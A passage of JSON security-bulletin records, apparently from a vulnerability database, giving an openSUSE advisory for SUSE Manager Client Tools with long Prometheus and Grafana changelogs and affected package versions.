"packageVersion": "7.1.5-bp152.3.3.1", "packageFilename": "grafana-7.1.5-bp152.3.3.1.aarch64.rpm", "packageName": "grafana"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "ppc64le", "operator": "lt", "packageVersion": "7.1.5-bp152.3.3.1", "packageFilename": "grafana-7.1.5-bp152.3.3.1.ppc64le.rpm", "packageName": "grafana"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "s390x", "operator": "lt", "packageVersion": "7.1.5-bp152.3.3.1", "packageFilename": "grafana-7.1.5-bp152.3.3.1.s390x.rpm", "packageName": "grafana"}, {"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "x86_64", "operator": "lt", "packageVersion": "7.1.5-bp152.3.3.1", "packageFilename": "grafana-7.1.5-bp152.3.3.1.x86_64.rpm", "packageName": "grafana"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}, {"id": "OPENSUSE-SU-2020:1105-1", "hash": "49c405febb63e910ad07746901836cd0", "type": "suse", "bulletinFamily": "unix", "title": "Security update for SUSE Manager Client Tools (moderate)", "description": "An update that solves four vulnerabilities and has 13 fixes\n is now available.\n\nDescription:\n\n\n This update fixes the following issues:\n\n dracut-saltboot:\n\n - Print a list of available disk devices (bsc#1170824)\n - Install wipefs to initrd\n - Force install crypt modules\n\n golang-github-prometheus-prometheus:\n\n - Update change log and spec file\n + Modified spec file: default to golang 1.14 to avoid \"have choice\"\n build issues in OBS.\n + Rebase and update patches for version 2.18.0\n - Update to 2.18.0\n + Features\n * Tracing: Added experimental Jaeger support #7148\n + Changes\n * Federation: Only use local TSDB for federation (ignore remote read).\n #7096\n * Rules: `rule_evaluations_total` and `rule_evaluation_failures_total`\n have a `rule_group` label now. #7094\n + Enhancements\n * TSDB: Significantly reduce WAL size kept around after a block cut.\n #7098\n * Discovery: Add `architecture` meta label for EC2. #7000\n + Bug fixes\n * UI: Fixed wrong MinTime reported by /status. #7182\n * React UI: Fixed multiselect legend on OSX. #6880\n * Remote Write: Fixed blocked resharding edge case. #7122\n * Remote Write: Fixed remote write not updating on relabel configs\n change. #7073\n - Changes from 2.17.2\n + Bug fixes\n * Federation: Register federation metrics #7081\n * PromQL: Fix panic in parser error handling #7132\n * Rules: Fix reloads hanging when deleting a rule group that is being\n evaluated #7138\n * TSDB: Fix a memory leak when prometheus starts with an empty TSDB\n WAL #7135\n * TSDB: Make isolation more robust to panics in web handlers #7129\n #7136\n - Changes from 2.17.1\n + Bug fixes\n * TSDB: Fix query performance regression that increased memory and CPU\n usage #7051\n - Changes from 2.17.0\n + Features\n * TSDB: Support isolation #6841\n * This release implements isolation in TSDB. API queries and recording\n rules are guaranteed to only see full scrapes and full recording\n rules. This comes with a certain overhead in resource usage.\n Depending on the situation, there might be some increase in memory\n usage, CPU usage, or query latency.\n + Enhancements\n * PromQL: Allow more keywords as metric names #6933\n * React UI: Add normalization of localhost URLs in targets page #6794\n * Remote read: Read from remote storage concurrently #6770\n * Rules: Mark deleted rule series as stale after a reload #6745\n * Scrape: Log scrape append failures as debug rather than warn #6852\n * TSDB: Improve query performance for queries that partially hit the\n head #6676\n * Consul SD: Expose service health as meta label #5313\n * EC2 SD: Expose EC2 instance lifecycle as meta label #6914\n * Kubernetes SD: Expose service type as meta label for K8s service\n role #6684\n * Kubernetes SD: Expose label_selector and field_selector #6807\n * Openstack SD: Expose hypervisor id as meta label #6962\n + Bug fixes\n * PromQL: Do not escape HTML-like chars in query log #6834 #6795\n * React UI: Fix data table matrix values #6896\n * React UI: Fix new targets page not loading when using non-ASCII\n characters #6892\n * Remote read: Fix duplication of metrics read from remote storage\n with external labels #6967 #7018\n * Remote write: Register WAL watcher and live reader metrics for all\n remotes, not just the first one #6998\n * Scrape: Prevent removal of metric names upon relabeling #6891\n * Scrape: Fix 'superfluous response.WriteHeader call' errors when\n scrape fails under some circonstances #6986\n * Scrape: Fix crash when reloads are separated by two scrape intervals\n #7011\n - Changes from 2.16.0\n + Features\n * React UI: Support local timezone on /graph #6692\n * PromQL: add absent_over_time query function #6490\n * Adding optional logging of queries to their own file #6520\n + Enhancements\n * React UI: Add support for rules page and \"Xs ago\" duration displays\n #6503\n * React UI: alerts page, replace filtering togglers tabs with\n checkboxes #6543\n * TSDB: Export metric for WAL write errors #6647\n * TSDB: Improve query performance for queries that only touch the most\n recent 2h of data. #6651\n * PromQL: Refactoring in parser errors to improve error messages #6634\n * PromQL: Support trailing commas in grouping opts #6480\n * Scrape: Reduce memory usage on reloads by reusing scrape cache #6670\n * Scrape: Add metrics to track bytes and entries in the metadata cache\n #6675\n * promtool: Add support for line-column numbers for invalid rules\n output #6533\n * Avoid restarting rule groups when it is unnecessary #6450\n + Bug fixes\n * React UI: Send cookies on fetch() on older browsers #6553\n * React UI: adopt grafana flot fix for stacked graphs #6603\n * React UI: broken graph page browser history so that back button\n works as expected #6659\n * TSDB: ensure compactionsSkipped metric is registered, and log proper\n error if one is returned from head.Init #6616\n * TSDB: return an error on ingesting series with duplicate labels #6664\n * PromQL: Fix unary operator precedence #6579\n * PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n * PromQL: Fix string and parentheses handling in engine, which\n affected React UI #6612\n * PromQL: Remove output labels returned by absent() if they are\n produced by multiple identical label matchers #6493\n * Scrape: Validate that OpenMetrics input ends with `# EOF` #6505\n * Remote read: return the correct error if configs can't be marshal'd\n to JSON #6622\n * Remote write: Make remote client `Store` use passed context, which\n can affect shutdown timing #6673\n * Remote write: Improve sharding calculation in cases where we would\n always be consistently behind by tracking pendingSamples #6511\n * Ensure prometheus_rule_group metrics are deleted when a rule group\n is removed #6693\n - Changes from 2.15.2\n + Bug fixes\n * TSDB: Fixed support for TSDB blocks built with Prometheus before\n 2.1.0. #6564\n * TSDB: Fixed block compaction issues on Windows. #6547\n - Changes from 2.15.1\n + Bug fixes\n * TSDB: Fixed race on concurrent queries against same data. #6512\n - Changes from 2.15.0\n + Features\n * API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n + Changes\n * Discovery: Removed `prometheus_sd_kubernetes_cache_*` metrics.\n Additionally `prometheus_sd_kubernetes_workqueue_latency_seconds`\n and `prometheus_sd_kubernetes_workqueue_work_duration_seconds`\n metrics now show correct values in seconds. #6393\n * Remote write: Changed `query` label on `prometheus_remote_storage_*`\n metrics to `remote_name` and `url`. #6043\n + Enhancements\n * TSDB: Significantly reduced memory footprint of loaded TSDB blocks.\n #6418 #6461\n * TSDB: Significantly optimized what we buffer during compaction which\n should result in lower memory footprint during compaction. #6422\n #6452 #6468 #6475\n * TSDB: Improve replay latency. #6230\n * TSDB: WAL size is now used for size based retention calculation.\n #5886\n * Remote read: Added query grouping and range hints to the remote read\n request #6401\n * Remote write: Added `prometheus_remote_storage_sent_bytes_total`\n counter per queue. #6344\n * promql: Improved PromQL parser performance. #6356\n * React UI: Implemented missing pages like `/targets` #6276, TSDB\n status page #6281 #6267 and many other fixes and performance\n improvements.\n * promql: Prometheus now accepts spaces between time range and square\n bracket. e.g `[ 5m]` #6065\n + Bug fixes\n * Config: Fixed alertmanager configuration to not miss targets when\n configurations are similar. #6455\n * Remote write: Value of `prometheus_remote_storage_shards_desired`\n gauge shows raw value of desired shards and it's updated correctly.\n #6378\n * Rules: Prometheus now fails the evaluation of rules and alerts where\n metric results collide with labels specified in `labels` field. #6469\n * API: Targets Metadata API `/targets/metadata` now accepts empty\n `match_targets` parameter as in the spec. #6303\n - Changes from 2.14.0\n + Features\n * API: `/api/v1/status/runtimeinfo` and `/api/v1/status/buildinfo`\n endpoints added for use by the React UI. #6243\n * React UI: implement the new experimental React based UI. #5694 and\n many more\n * Can be found by under `/new`.\n * Not all pages are implemented yet.\n * Status: Cardinality statistics added to the Runtime & Build\n Information page. #6125\n + Enhancements\n * Remote write: fix delays in remote write after a compaction. #6021\n * UI: Alerts can be filtered by state. #5758\n + Bug fixes\n * Ensure warnings from the API are escaped. #6279\n * API: lifecycle endpoints return 403 when not enabled. #6057\n * Build: Fix Solaris build. #6149\n * Promtool: Remove false duplicate rule warnings when checking rule\n files with alerts. #6270\n * Remote write: restore use of deduplicating logger in remote write.\n #6113\n * Remote write: do not reshard when unable to send samples. #6111\n * Service discovery: errors are no longer logged on context\n cancellation. #6116, #6133\n * UI: handle null response from API properly. #6071\n - Changes from 2.13.1\n + Bug fixes\n * Fix panic in ARM builds of Prometheus. #6110\n * promql: fix potential panic in the query logger. #6094\n * Multiple errors of http: superfluous response.WriteHeader call in\n the logs. #6145\n - Changes from 2.13.0\n + Enhancements\n * Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n * Include the tsdb tool in builds. #6089\n * Service discovery: add new node address types for kubernetes. #5902\n * UI: show warnings if query have returned some warnings. #5964\n * Remote write: reduce memory usage of the series cache. #5849\n * Remote read: use remote read streaming to reduce memory usage. #5703\n * Metrics: added metrics for remote write max/min/desired shards to\n queue manager. #5787\n * Promtool: show the warnings during label query. #5924\n * Promtool: improve error messages when parsing bad rules. #5965\n * Promtool: more promlint rules. #5515\n + Bug fixes\n * UI: Fix a Stored DOM XSS vulnerability with query history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-102\n 15). #6098\n * Promtool: fix recording inconsistency due to duplicate labels. #6026\n * UI: fixes service-discovery view when accessed from unhealthy\n targets. #5915\n * Metrics format: OpenMetrics parser crashes on short input. #5939\n * UI: avoid truncated Y-axis values. #6014\n - Changes from 2.12.0\n + Features\n * Track currently active PromQL queries in a log file. #5794\n * Enable and provide binaries for `mips64` / `mips64le` architectures.\n #5792\n + Enhancements\n * Improve responsiveness of targets web UI and API endpoint. #5740\n * Improve remote write desired shards calculation. #5763\n * Flush TSDB pages more precisely. tsdb#660\n * Add `prometheus_tsdb_retention_limit_bytes` metric. tsdb#667\n * Add logging during TSDB WAL replay on startup. tsdb#662\n * Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654, tsdb#642,\n tsdb#627\n + Bug fixes\n * Check for duplicate label names in remote read. #5829\n * Mark deleted rules' series as stale on next evaluation. #5759\n * Fix JavaScript error when showing warning about out-of-sync server\n time. #5833\n * Fix `promtool test rules` panic when providing empty `exp_labels`.\n #5774\n * Only check last directory when discovering checkpoint number. #5756\n * Fix error propagation in WAL watcher helper functions. #5741\n * Correctly handle empty labels from alert templates. #5845\n - Update Uyuni/SUSE Manager service discovery patch\n + Adapt service discovery to the new Uyuni API endpoints\n + Modified spec file: force golang 1.12 to fix build issues in SLE15SP2\n - Update to Prometheus 2.11.2\n\n grafana:\n\n - Update to version 7.0.3\n * Features / Enhancements\n - Stats: include all fields. #24829, @ryantxu\n - Variables: change VariableEditorList row action Icon to IconButton.\n #25217, @hshoff\n * Bug fixes\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317, @papagian\n - Configuration: Fix env var override of sections containing hyphen.\n #25178, @marefr\n - Dashboard: Get panels in collapsed rows. #25079, @peterholmberg\n - Do not show alerts tab when alerting is disabled. #25285, @dprokop\n - Jaeger: fixes cascader option label duration value. #25129, @Estrax\n - Transformations: Fixed Transform tab crash & no update after adding\n first transform. #25152, @torkelo\n - Update to version 7.0.2\n * Bug fixes\n - Security: Urgent security patch release to fix CVE-2020-13379\n - Update to version 7.0.1\n * Features / Enhancements\n - Datasource/CloudWatch: Makes CloudWatch Logs query history more\n readable. #24795, @kaydelaney\n - Download CSV: Add date and time formatting. #24992, @ryantxu\n - Table: Make last cell value visible when right aligned. #24921,\n @peterholmberg\n - TablePanel: Adding sort order persistance. #24705, @torkelo\n - Transformations: Display correct field name when using reduce\n transformation. #25068, @peterholmberg\n - Transformations: Allow custom number input for binary operations.\n #24752, @ryantxu\n * Bug fixes\n - Dashboard/Links: Fixes dashboard links by tags not working. #24773,\n @KamalGalrani\n - Dashboard/Links: Fixes open in new window for dashboard link.\n #24772, @KamalGalrani\n - Dashboard/Links: Variables are resolved and limits to 100. #25076,\n @hugohaggmark\n - DataLinks: Bring back variables interpolation in title. #24970,\n @dprokop\n - Datasource/CloudWatch: Field suggestions no longer limited to\n prefix-only. #24855, @kaydelaney\n - Explore/Table: Keep existing field types if possible. #24944,\n @kaydelaney\n - Explore: Fix wrap lines toggle for results of queries with filter\n expression. #24915, @ivanahuckova\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n - Explore: fix word break in type head info. #25014, @zoltanbedi\n - Graph: Legend decimals now work as expected. #24931, @torkelo\n - LoginPage: Fix hover color for service buttons. #25009, @tskarhed\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n - MoveDashboard: Fix for moving dashboard caused all variables to be\n lost. #25005, @torkelo\n - Organize transformer: Use display name in field order comparer.\n #24984, @dprokop\n - Panel: shows correct panel menu items in view mode. #24912,\n @hugohaggmark\n - PanelEditor Fix missing labels and description if there is only\n single option in category. #24905, @dprokop\n - PanelEditor: Overrides name matcher still show all original field\n names even after Field default display name is specified. #24933,\n @torkelo\n - PanelInspector: Makes sure Data display options are visible. #24902,\n @hugohaggmark\n - PanelInspector: Hides unsupported data display options for Panel\n type. #24918, @hugohaggmark\n - PanelMenu: Make menu disappear on button press. #25015, @tskarhed\n - Postgres: Fix add button. #25087, @phemmer\n - Prometheus: Fix recording rules expansion. #24977, @ivanahuckova\n - Stackdriver: Fix creating Service Level Objectives (SLO) datasource\n query variable. #25023, @papagian\n - Update to version 7.0.0\n * Breaking changes\n - Removed PhantomJS: PhantomJS was deprecated in Grafana v6.4 and\n starting from Grafana v7.0.0, all PhantomJS support has been\n removed. This means that Grafana no longer ships with a built-in\n image renderer, and we advise you to install the Grafana Image\n Renderer plugin.\n - Dashboard: A global minimum dashboard refresh interval is now\n enforced and defaults to 5 seconds.\n - Interval calculation: There is now a new option Max data points that\n controls the auto interval $__interval calculation. Interval was\n previously calculated by dividing the panel width by the time range.\n With the new max data points option it is now easy to set\n $__interval to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will dynamically\n set $__interval by dividing the current time range by 10.\n - Datasource/Loki: Support for deprecated Loki endpoints has been\n removed.\n - Backend plugins: Grafana now requires backend plugins to be signed,\n otherwise Grafana will not load/start them. This is an additional\n security measure to make sure backend plugin binaries and files\n haven't been tampered with. Refer to Upgrade Grafana for more\n information.\n - @grafana/ui: Forms migration notice, see @grafana/ui changelog\n - @grafana/ui: Select API change for creating custom values, see\n @grafana/ui changelog\n + Deprecation warnings\n - Scripted dashboards is now deprecated. The feature is not removed\n but will be in a future release. We hope to address the underlying\n requirement of dynamic dashboards in a different way. #24059\n - The unofficial first version of backend plugins together with\n usage of grafana/grafana-plugin-model is now deprecated and support for\n that will be removed in a future release. Please refer to backend plugins\n documentation for information about the new officially supported backend\n plugins.\n * Features / Enhancements\n - Backend plugins: Log deprecation warning when using the unofficial\n first version of backend plugins. #24675, @marefr\n - Editor: New line on Enter, run query on Shift+Enter. #24654, @davkal\n - Loki: Allow multiple derived fields with the same name. #24437,\n @aocenas\n - Orgs: Add future deprecation notice. #24502, @torkelo\n * Bug Fixes\n - @grafana/toolkit: Use process.cwd() instead of PWD to get directory.\n #24677, @zoltanbedi\n - Admin: Makes long settings values line break in settings page.\n #24559, @hugohaggmark\n - Dashboard: Allow editing provisioned dashboard JSON and add\n confirmation when JSON is copied to dashboard. #24680, @dprokop\n - Dashboard: Fix for strange \"dashboard not found\" errors when opening\n links in dashboard settings. #24416, @torkelo\n - Dashboard: Fix so default data source is selected when data source\n can't be found in panel editor. #24526, @mckn\n - Dashboard: Fixed issue changing a panel from transparent back to\n normal in panel editor. #24483, @torkelo\n - Dashboard: Make header names reflect the field name when exporting\n to CSV file from the the panel inspector. #24624, @peterholmberg\n - Dashboard: Make sure side pane is displayed with tabs by default in\n panel editor. #24636, @dprokop\n - Data source: Fix query/annotation help content formatting. #24687,\n @AgnesToulet\n - Data source: Fixes async mount errors. #24579, @Estrax\n - Data source: Fixes saving a data source without failure when URL\n doesn't specify a protocol. #24497, @aknuds1\n - Explore/Prometheus: Show results of instant queries only in table.\n #24508, @ivanahuckova\n - Explore: Fix rendering of react query editors. #24593, @ivanahuckova\n - Explore: Fixes loading more logs in logs context view. #24135,\n @Estrax\n - Graphite: Fix schema and dedupe strategy in rollup indicators for\n Metrictank queries. #24685, @torkelo\n - Graphite: Makes query annotations work again. #24556, @hugohaggmark\n - Logs: Clicking \"Load more\" from context overlay doesn't expand log\n row. #24299, @kaydelaney\n - Logs: Fix total bytes process calculation. #24691, @davkal\n - Org/user/team preferences: Fixes so UI Theme can be set back to\n Default. #24628, @AgnesToulet\n - Plugins: Fix manifest validation. #24573, @aknuds1\n - Provisioning: Use proxy as default access mode in provisioning.\n #24669, @bergquist\n - Search: Fix select item when pressing enter and Grafana is served\n using a sub path. #24634, @tskarhed\n - Search: Save folder expanded state. #24496, @Clarity-89\n - Security: Tag value sanitization fix in OpenTSDB data source.\n #24539, @rotemreiss\n - Table: Do not include angular options in options when switching from\n angular panel. #24684, @torkelo\n - Table: Fixed persisting column resize for time series fields.\n #24505, @torkelo\n - Table: Fixes Cannot read property subRows of null. #24578,\n @hugohaggmark\n - Time picker: Fixed so you can enter a relative range in the time\n picker without being converted to absolute range. #24534, @mckn\n - Transformations: Make transform dropdowns not cropped. #24615,\n @dprokop\n - Transformations: Sort order should be preserved as entered by user\n when using the reduce transformation. #24494, @hugohaggmark\n - Units: Adds scale symbol for currencies with suffixed symbol.\n #24678, @hugohaggmark\n - Variables: Fixes filtering options with more than 1000 entries.\n #24614, @hugohaggmark\n - Variables: Fixes so Textbox variables read value from url. #24623,\n @hugohaggmark\n - Zipkin: Fix error when span contains remoteEndpoint. #24524, @aocenas\n - SAML: Switch from email to login for user login attribute mapping\n (Enterprise)\n - Update Makefile and spec file\n * Remove phantomJS patch from Makefile\n * Fix multiline strings in Makefile\n * Exclude s390 from SLE12 builds, golang 1.14 is not built for s390\n - Add instructions for patching the Grafana javascript frontend.\n - BuildRequires golang(API) instead of go metapackage version range\n * BuildRequires: golang(API) >= 1.14 from BuildRequires: ( go >=\n 1.14 with go < 1.15 )\n - Update to version 6.7.3\n - This version fixes bsc#1170557 and its corresponding CVE-2020-12245\n - Admin: Fix Synced via LDAP message for non-LDAP external users.\n #23477, @alexanderzobnin\n - Alerting: Fixes notifications for alerts with empty message in Google\n Hangouts notifier. #23559, @hugohaggmark\n - AuthProxy: Fixes bug where long username could not be cached.. #22926,\n @jcmcken\n - Dashboard: Fix saving dashboard when editing raw dashboard JSON model.\n #23314, @peterholmberg\n - Dashboard: Try to parse 8 and 15 digit numbers as timestamps if\n parsing of time range as date fails. #21694, @jessetan\n - DashboardListPanel: Fixed problem with empty panel after going into\n edit mode (General folder filter being automatically added) . #23426,\n @torkelo\n - Data source: Handle datasource withCredentials option properly.\n #23380, @hvtuananh\n - Security: Fix annotation popup XSS vulnerability. #23813, @torkelo\n - Server: Exit Grafana with status code 0 if no error. #23312, @aknuds1\n - TablePanel: Fix XSS issue in header column rename (backport). #23814,\n @torkelo\n - Variables: Fixes error when setting adhoc variable values. #23580,\n @hugohaggmark\n - Update to version 6.7.2: (see installed changelog for the full list of\n changes)\n - BackendSrv: Adds config to response to fix issue for external plugins\n that used this property . #23032, @torkelo\n - Dashboard: Fixed issue with saving new dashboard after changing title\n . #23104, @dprokop\n - DataLinks: make sure we use the correct datapoint when dataset\n contains null value.. #22981, @mckn\n - Plugins: Fixed issue for plugins that imported dateMath util .\n #23069, @mckn\n - Security: Fix for dashboard snapshot original dashboard link could\n contain XSS vulnerability in url. #23254, @torkelo\n - Variables: Fixes issue with too many queries being issued for nested\n template variables after value change. #23220, @torkelo\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n - Reporting (Enterprise): Fixes issue updating a report created by\n someone else\n - Update to 6.7.1: (see installed changelog for the full list of changes)\n Bug Fixes\n - Azure: Fixed dropdowns not showing current value. #22914, @torkelo\n - BackendSrv: only add content-type on POST, PUT requests. #22910,\n @hugohaggmark\n - Panels: Fixed size issue with panel internal size when exiting panel\n edit mode. #22912, @torkelo\n - Reporting: fixes migrations compatibility with mysql (Enterprise)\n - Reporting: Reduce default concurrency limit to 4 (Enterprise)\n - Update to 6.7.0: (see installed changelog for the full list of changes)\n Bug Fixes\n - AngularPanels: Fixed inner height calculation for angular panels .\n #22796, @torkelo\n - BackendSrv: makes sure provided headers are correctly recognized and\n set. #22778, @hugohaggmark\n - Forms: Fix input suffix position (caret-down in Select) . #22780,\n @torkelo\n - Graphite: Fixed issue with query editor and next select metric now\n showing after selecting metric node . #22856, @torkelo\n - Rich History: UX adjustments and fixes. #22729, @ivanahuckova\n - Update to 6.7.0-beta1: Breaking changes\n - Slack: Removed Mention setting and instead introduce Mention Users,\n Mention Groups, and Mention Channel. The first two settings require\n user and group IDs, respectively. This change was necessary because\n the way of mentioning via the Slack API changed and mentions in Slack\n notifications no longer worked.\n - Alerting: Reverts the behavior of diff and percent_diff to not always\n be absolute. Something we introduced by mistake in 6.1.0. Alerting\n now support diff(), diff_abs(), percent_diff() and\n percent_diff_abs(). #21338\n - Notice about changes in backendSrv for plugin authors In our mission\n to migrate away from AngularJS to React we have removed all AngularJS\n dependencies in the core data retrieval service backendSrv. Removing\n the AngularJS dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for any request\n made with backendSrv. Because of this, external plugins using\n backendSrv directly may suffer from strange behaviour in the UI. To\n remedy this issue, as a plugin author you need to trigger the digest\n after a direct call to backendSrv. Bug Fixes API: Fix redirect issues.\n #22285, @papagian Alerting: Don't include image_url field with Slack\n message if empty. #22372, @aknuds1 Alerting: Fixed bad background\n color for default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to annotation, they\n will now show up right away without a manual refresh. #22323, @krvajal\n Azure Monitor: Fix app insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST body for form\n data. #21714, @hugohaggmark CloudWatch: Credentials cache invalidation\n fix. #22473, @sunker CloudWatch: Expand alias variables when query\n yields no result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of multiline logs in\n log panel and explore. #22057, @thomasdraebing Heatmap: Legend color\n range is incorrect when using custom min/max. #21748, @sv5d Security:\n Fixed XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null values . #22646,\n @torkelo\n - Update to version 6.6.2: (see installed changelog for the full list of\n changes)\n - Update to version 6.6.1: (see installed changelog for the full list of\n changes)\n - Update to version 6.6.0: (see installed changelog for the full list of\n changes)\n - Update to version 6.5.3: (see installed changelog for the full list of\n changes)\n - Update to version 6.5.2: (see installed changelog for the full list of\n changes)\n - Update to version 6.5.1: (see installed changelog for the full list of\n changes)\n - Update to version 6.5.0 (see installed changelog for the full list of\n changes)\n - Update to version 6.4.5:\n * Create version 6.4.5\n * CloudWatch: Fix high CPU load (#20579)\n - Add obs-service-go_modules to download required modules into\n vendor.tar.gz\n - Adjusted spec file to use vendor.tar.gz\n - Adjusted Makefile to work with new filenames\n - BuildRequire go1.14\n - Update to version 6.4.4:\n * DataLinks: Fix blur issues. #19883, @aocenas\n * Docker: Makes it possible to parse timezones in the docker image.\n #20081, @xlson\n * LDAP: All LDAP servers should be tried even if one of them returns a\n connection error. #20077, @jongyllen\n * LDAP: No longer shows incorrectly matching groups based on role in\n debug page. #20018, @xlson\n * Singlestat: Fix no data / null value mapping . #19951, @ryantxu\n - Revert the spec file and make script\n - Remove PhantomJS dependency\n - Update to 6.4.3\n * Bug Fixes\n - Alerting: All notification channels should send even if one fails to\n send. #19807, @jan25\n - AzureMonitor: Fix slate interference with dropdowns. #19799, @aocenas\n - ContextMenu: make ContextMenu positioning aware of the viewport\n width. #19699, @krvajal\n - DataLinks: Fix context menu not showing in singlestat-ish\n visualisations. #19809, @dprokop\n - DataLinks: Fix url field not releasing focus. #19804, @aocenas\n - Datasource: Fixes clicking outside of some query editors required 2\n clicks. #19822, @aocenas\n - Panels: Fixes default tab for visualizations without Queries Tab.\n #19803, @hugohaggmark\n - Singlestat: Fixed issue with mapping null to text. #19689, @torkelo\n - @grafana/toolkit: Don't fail plugin creation when git user.name\n config is not set. #19821, @dprokop\n - @grafana/toolkit: TSLint line number off by 1. #19782, @fredwangwang\n - Update to 6.4.2\n * Bug Fixes\n - CloudWatch: Changes incorrect dimension wmlid to wlmid . #19679,\n @ATTron\n - Grafana Image Renderer: Fixes plugin page. #19664, @hugohaggmark\n - Graph: Fixes auto decimals logic for y axis ticks that results in\n too many decimals for high values. #19618, @torkelo\n - Graph: Switching to series mode should re-render graph. #19623,\n @torkelo\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n - Loki: Removes live option for logs panel. #19533, @davkal\n - Profile: Fix issue with user profile not showing more than sessions\n sessions in some cases. #19578, @huynhsamha\n - Prometheus: Fixes so results in Panel always are sorted by query\n order. #19597, @hugohaggmark\n - ShareQuery: Fixed issue when using -- Dashboard -- datasource (to\n share query result) when dashboard had rows. #19610, @torkelo\n - Show SAML login button if SAML is enabled. #19591, @papagian\n - SingleStat: Fixes postfix/prefix usage. #19687, @hugohaggmark\n - Table: Proper handling of json data with dataframes. #19596, @marefr\n - Units: Fixed wrong id for Terabits/sec. #19611, @andreaslangnevyjel\n - Changes from 6.4.1\n * Bug Fixes\n - Provisioning: Fixed issue where empty nested keys in YAML\n provisioning caused a server crash, #19547\n - ImageRendering: Fixed issue with image rendering in enterprise build\n (Enterprise)\n - Reporting: Fixed issue with reporting service when STMP was disabled\n (Enterprise).\n - Changes from 6.4.0\n * Features / Enhancements\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n - DataLinks: Suggestions menu improvements. #19396, @dprokop\n - Explore: Take root_url setting into account when redirecting from\n dashboard to explore. #19447, @ivanahuckova\n - Explore: Update broken link to logql docs. #19510, @ivanahuckova\n - Logs: Adds Logs Panel as a visualization. #19504, @davkal\n * Bug Fixes\n - CLI: Fix version selection for plugin install. #19498, @aocenas\n - Graph: Fixes minor issue with series override color picker and\n custom color . #19516, @torkelo\n - Changes from 6.4.0 Beta 2\n * Features / Enhancements\n - Azure Monitor: Remove support for cross resource queries (#19115)\".\n #19346, @sunker\n - Docker: Upgrade packages to resolve reported vulnerabilities.\n #19188, @marefr\n - Graphite: Time range expansion reduced from 1 minute to 1 second.\n #19246, @torkelo\n - grafana/toolkit: Add plugin creation task. #19207, @dprokop\n * Bug Fixes\n - Alerting: Prevents creating alerts from unsupported queries. #19250,\n @hugohaggmark\n - Alerting: Truncate PagerDuty summary when greater than 1024\n characters. #18730, @nvllsvm\n - Cloudwatch: Fix autocomplete for Gamelift dimensions. #19146,\n @kevinpz\n - Dashboard: Fix export for sharing when panels use default data\n source. #19315, @torkelo\n - Database: Rewrite system statistics query to perform better. #19178,\n @papagian\n - Gauge/BarGauge: Fix issue with [object Object] in titles . #19217,\n @ryantxu\n - MSSQL: Revert usage of new connectionstring format introduced by\n #18384. #19203, @marefr\n - Multi-LDAP: Do not fail-fast on invalid credentials. #19261, @gotjosh\n - MySQL, Postgres, MSSQL: Fix validating query with template variables\n in alert . #19237, @marefr\n - MySQL, Postgres: Update raw sql when query builder updates. #19209,\n @marefr\n - MySQL: Limit datasource error details returned from the backend.\n #19373, @marefr\n - Changes from 6.4.0 Beta 1\n * Features / Enhancements\n - API: Readonly datasources should not be created via the API. #19006,\n @papagian\n - Alerting: Include configured AlertRuleTags in Webhooks notifier.\n #18233, @dominic-miglar\n - Annotations: Add annotations support to Loki. #18949, @aocenas\n - Annotations: Use a single row to represent a region. #17673, @ryantxu\n - Auth: Allow inviting existing users when login form is disabled.\n #19048, @548017\n - Azure Monitor: Add support for cross resource queries. #19115,\n @sunker\n - CLI: Allow installing custom binary plugins. #17551, @aocenas\n - Dashboard: Adds Logs Panel (alpha) as visualization option for\n Dashboards. #18641, @hugohaggmark\n - Dashboard: Reuse query results between panels . #16660, @ryantxu\n - Dashboard: Set time to to 23:59:59 when setting To time using\n calendar. #18595, @simPod\n - DataLinks: Add DataLinks support to Gauge, BarGauge and SingleStat2\n panel. #18605, @ryantxu\n - DataLinks: Enable access to labels & field names. #18918, @torkelo\n - DataLinks: Enable multiple data links per panel. #18434, @dprokop\n - Docker: switch docker image to alpine base with phantomjs support.\n #18468, @DanCech\n - Elasticsearch: allow templating queries to order by doc_count.\n #18870, @hackery\n - Explore: Add throttling when doing live queries. #19085, @aocenas\n - Explore: Adds ability to go back to dashboard, optionally with query\n changes. #17982, @kaydelaney\n - Explore: Reduce default time range to last hour. #18212, @davkal\n - Gauge/BarGauge: Support decimals for min/max. #18368, @ryantxu\n - Graph: New series override transform constant that renders a single\n point as a line across the whole graph. #19102, @davkal\n - Image rendering: Add deprecation warning when PhantomJS is used for\n rendering images. #18933, @papagian\n - InfluxDB: Enable interpolation within ad-hoc filter values. #18077,\n @kvc-code\n - LDAP: Allow an user to be synchronized against LDAP. #18976, @gotjosh\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n - Loki: Remove prefetching of default label values. #18213, @davkal\n - Metrics: Add failed alert notifications metric. #18089, @koorgoo\n - OAuth: Support JMES path lookup when retrieving user email. #14683,\n @bobmshannon\n - OAuth: return GitLab groups as a part of user info (enable team\n sync). #18388, @alexanderzobnin\n - Panels: Add unit for electrical charge - ampere-hour. #18950,\n @anirudh-ramesh\n - Plugin: AzureMonitor - Reapply MetricNamespace support. #17282,\n @raphaelquati\n - Plugins: better warning when plugins fail to load. #18671, @ryantxu\n - Postgres: Add support for scram sha 256 authentication. #18397,\n @nonamef\n - RemoteCache: Support SSL with Redis. #18511, 